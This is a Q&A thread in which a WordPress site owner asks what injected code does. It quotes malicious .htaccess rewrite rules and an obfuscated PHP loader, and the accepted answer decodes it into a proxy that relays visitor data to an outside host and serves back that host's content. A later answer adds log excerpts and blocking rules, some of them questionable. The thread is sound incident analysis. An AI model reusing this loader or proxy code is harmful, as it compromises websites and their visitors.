# What does this code mean? (Virus Looking)

Tags: php, wordpress, ubuntu, virus

I'm wondering if anyone can figure out what the code in this php does

I've removed it now but i'm curious as to how it got there and what it does

I found this in one of my wordpress sites

```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(emyiac-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/emyiacimwqkfv-.php?p=$2 [L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(auyaix-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/auyaixfblclcc-.php?p=$2 [L]
</IfModule>
```

And one of the files contains this:

```
<?php $TWRgwh3="6jsmOpAjZ5Bi5Ll2wfssHqB3cBfkZgGlMnzBalluE/Hi5mPZ9XQ6wo21mQNXZanQAAvE8X/GnjBNvD0dEbPCDPD1hoOiSjwuWReEae1cV3DnIhxxXbDWak5n7uteSIOeKlQ7HHX+fRlp/ESRTLFEgPHdF2y698RzSYrsp0rU8Aas3bH+gb6j+1D03qNaS/PUqReuTrZtETiQCi4LUHo4gRxzKp/6TXUk+aN3FzWOBI6Ini3YXbgcKPoop3wVviiKz9C3JuSg/eFgGqslnyo+eCmEk1Vl+NiIBBO8z9N+DA/VrM4z0DeobnbIbPlTrxqUPmOX1/SsphPhOgTvqi2mdbJQqEinevjitWI+BNPngJpO21mfOzu982FXRD/7vdcp1pnBoipzKLf7XEXOx0i3tcFVVB8/+5k5o4f8eYDPQawmvLN7fNr3SS126GLAkPVi9e6ovA6DRe78E5xzixe9iguUgvAyg1kk9vGHcICXoJ9tI8QaiP67W4j/L1scsNGGwZxRc41fLW0I1xFNZSlgOIpaMeIq2vrRvG6fXE8uUpSooTesUAmkzKfcJY8ixOAEI5JSS4QPfjgDqsvY5wVXx80CQvUBj1TFzCFhHeOTCKOVOh7QYwkyosnH7OW4ql0yXEiAr2KizXx8A909Pd/kJb3RnMk9qsOf5NU0Si4DDIjB1D5IvU/0LmKioSMQo8ZDMrgHUJKxXqSjRgG4DN+sk1zucAxNJ2yQkXCb+4wWLJelYkLyDun19PmA7gtUxTZWvF/DUje1a4FNqnI31zYLIc4d34AvTwQfRuaBZyDKbCrWmAbJ5N6qTYpwofIyWM3odv+IFbmmb58UaDU44CJQJzrE9Sg4ScIllAUlD8rODiGSbLdf/zf4nM91LH6x0AKJZ1xp+Ekm5p1ZHMjeNfzPwMm+oorgi1Pwpm2XIdYV2WgN+2K+FFYCvUA5IRgqspaerwIC/qrrJkP6RAGo3wzuxWZY3CB9qin/iw2CqrVDSDuPHW69sI16EVY5zzyDL7Mf4WNKcPlUyaj2f6i9WaQShXxvjyQL9LJ9b99k58jXIVDqDhID16dlZq6loIKq10/3nXSN7OIQLtWY0liMcLR0HZ6vGdKELM9VJGxLoedP9o0Y4Z+Q2kjqos8Qm8Di3X4LhO2SmOAuFZ6ENqGSQ4JJRe8SGn/8JTNDQ7MfaD+DlwiuCOSQYg==";$kYIKQj="\141";$syMk1BFi="\x62\x61\x73";$ZTMvjgX="\163\164";$yW51kL="Fl1YmASDIjxWQ0bimmP2IFzh9Z02qUYY1VNWnIdeBTMHhb";$cBqLFy="\x67\x7a\151";$cBqLFy.="\156\x66";$kYIKQj.="\163";$yW51kL.="GnXvyMd1FTzkcz+9tdyrqTyacaX1za5EqcdXEJOefUMKao";$syMk1BFi.="\x65\66\x34";$ZTMvjgX.="\162\137\x72";$ZTMvjgX.="\157\x74";$cBqLFy.="\x6c\x61";$syMk1BFi.="\x5f\x64\x65\143";$yW51kL.="TywQzQnJObMjwen2WfDRCqixwPXA/XVHhAaEZQJkzaStpL";$kYIKQj.="\163\145";$cBqLFy.="\x74\x65";$syMk1BFi.="\x6f\x64\145";$yW51kL.="w5pTSIf1uAGJhUIWNoIMXqPa3pXwHtMtTS1GJgND==";$kYIKQj.="\162\x74";$ZTMvjgX.="\x31\x33";@$kYIKQj($cBqLFy($syMk1BFi($ZTMvjgX($yW51kL))));?>
```

Comment: first one looks like .htaccess file. ans second one is some normal file with some scripted  values assigned to some variables.

Comment: Bad obfuscated code..

Comment: If you don't know what it is the the answers to your questions are 1) you've been hacked; and 2) something malicious.

Comment: @anantkumarsingh I know the first one is htaccess, that's where I discovered the php file

Comment: if you did not put them there - your in trouble, simply removing them wont stop them coming back if you don't patch the hole that let them in. https://codex.wordpress.org/FAQ_My_site_was_hacked

Answer (score 2, accepted):

Since the question was "what does this code mean?" Here is what that code boils down to.

If I were you, I'd start looking through my access log files for entries where `?p=` was included in the url.

```
<?php
header('Content-Type: text/html; charset=UTF-8');
$p = 'p'; 
$host='websys-nt.com';
$path='/wb0454545/';
$srvr=$_SERVER['HTTP_HOST'].'/';

function GetRealIp()
{
 if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
 {   $ip=$_SERVER['HTTP_CLIENT_IP'];}
 elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
 {  $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}
 else
 {   $ip=$_SERVER['REMOTE_ADDR'];}
 return $ip;
} 

if(isset($_GET[$p])) 
{
$r = GetRealIp();
if (strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")!==FALSE) $r = substr($_SERVER["HTTP_USER_AGENT"], strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")+4);

$param=$_GET[$p];
if (strpos($param, '.js') !== false)
{
$ext='.js';
$param = str_replace('.js','',$param);
$srvr='';
}
else if(strpos($param, 'prokl-') !== false)
{
$ext='.php?tds-q='.urlencode(substr($param, strpos($param, "prokl-")+6));
$param='prokl';
$srvr='';
}
else if(strpos($param, '.css') !== false)
{
$ext='.css';
$param = str_replace('.css','',$param);
$srvr='';
}
else if(strpos($param, '.gif') !== false)
{
$ext='.gif';
$param = str_replace('.gif','',$param);
$srvr='';
}
else if(strpos($param, '.htm') !== false)
{
$ext='.htm';
$param 
= str_replace('.htm','',$param);
$srvr='';
}
else if(strpos($param, '.jpg') !== false)
{
$ext='.jpg';
$param = str_replace('.jpg','',$param);
$srvr='';
}
else if(strpos($param, '.ico') !== false)
{
$ext='.ico';
$param = str_replace('.ico','',$param);
$srvr='';
}
else if(strpos($param, '.png') !== false)
{
$ext='.png';
$param = str_replace('.png','',$param);
$srvr='';
}
else{
$rf=$_SERVER['HTTP_REFERER'];
$ext='.php?ip='.$r.'&ref='.$ref;
}
$out ='';
$buff = '';
if ($curl = curl_init())
        {
        curl_setopt($curl, CURLOPT_URL, 'http://'.$host.$path.$srvr.$param.$ext);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
        $out = curl_exec($curl);
        curl_close($curl);
        }else{
        $fp = fsockopen($host, 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET ".$path.$srvr.$param.$ext." HTTP/1.1\r\n";
    $out .= "Host: ".$host."\r\n";
    $out .= "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        $buff.=fgets($fp, 128);
    }
    $result = explode("\r\n\r\n", $buff, 2);
    $out= $result[1];
    fclose($fp);
} 
    }
    echo $out;
    exit
    ;   
}       
?>
```

Comment: Wow, whoever made that is terrible at writing code. Looks like a PHP proxy.

Answer (score 0):

Browsed all over internet and just found your post. Same thing happend to me on one of my infected sites. I have been investigating why my server overload every once in a while and pinpointed to what you just asked. Seems like the script creates many requests and saturates the site.

```
66.249.73.1 - - [17/Dec/2023:04:51:37 -0500] "GET /shadow.php?r/I3196884.html HTTP/1.1" 404 1711 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.1 - - [17/Dec/2023:04:52:25 -0500] "GET /shadow.php?d/T1084079.html HTTP/1.1" 404 1711 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
```

I believe is an virus attack, the htaccess file was changed to this

```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
DirectoryIndex index.php
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
```

And it was supposed to be this

```
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# hace que cambie el PHP primero y luego cargue el HTML
<IfModule dir_module>
    DirectoryIndex index.php
    DirectoryIndex index.html
</IfModule>

# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php56” package as the default “PHP” programming language.
<IfModule mime_module>
  AddType application/x-httpd-ea-php56 .php .php5 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit

Header add Access-Control-Allow-Origin "*"
```

It looks as a Google bot, but I believe is a bot crawlin virus usurpating a google bot. Check this out here https://support.google.com/webmasters/thread/160538224/google-bot-crawling-links-recieved-from-malicious-sources?hl=en

Im still working on that, reversing the damage using backup and checking for changed files one by one, it is easy since all changed files are from same date and then replacing to a previous stored version. (still fixing it, update later to see a better fix) Put site on hold and inmutable (unchangable by nobody using this command on public files)

```
chattr -R +i public_html
```

and reversing back once figure it out

```
chattr -R -i public_html
```

You can read further on this google document "**How to stop impersonating googlebot sending a lot (thousands of fake urls request in just minutes)**" https://support.google.com/webmasters/thread/137610106/how-to-stop-impersonating-googlebot-sending-a-lot-thousands-of-fake-urls-request-in-just-minutes?hl=en

**NOTE**: Immediate fix while repairs are done, is to block google impersonating IPs thru firewall deny range of IPs. for example if 66.249.73.1 is atacking, then just ban 66.249.73.0/24 and then, once you fixed the code, then remove those good impersonated IPs otherwise your site will not be listed on google lookups.

[image: This is what it does if not fixed]

**UPDATE:**
It is a pain to wait to find out bad impersonating google IPs after they attacked your server. While this is going on or better before it happens again, you can block them completely to avoid overloading of your server. Just modify the suspected .htaccess file on that website and will stop bots.

```
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|Baiduspider|PetalBot|SemrushBot) [NC]
RewriteRule .* - [R=403,L]
```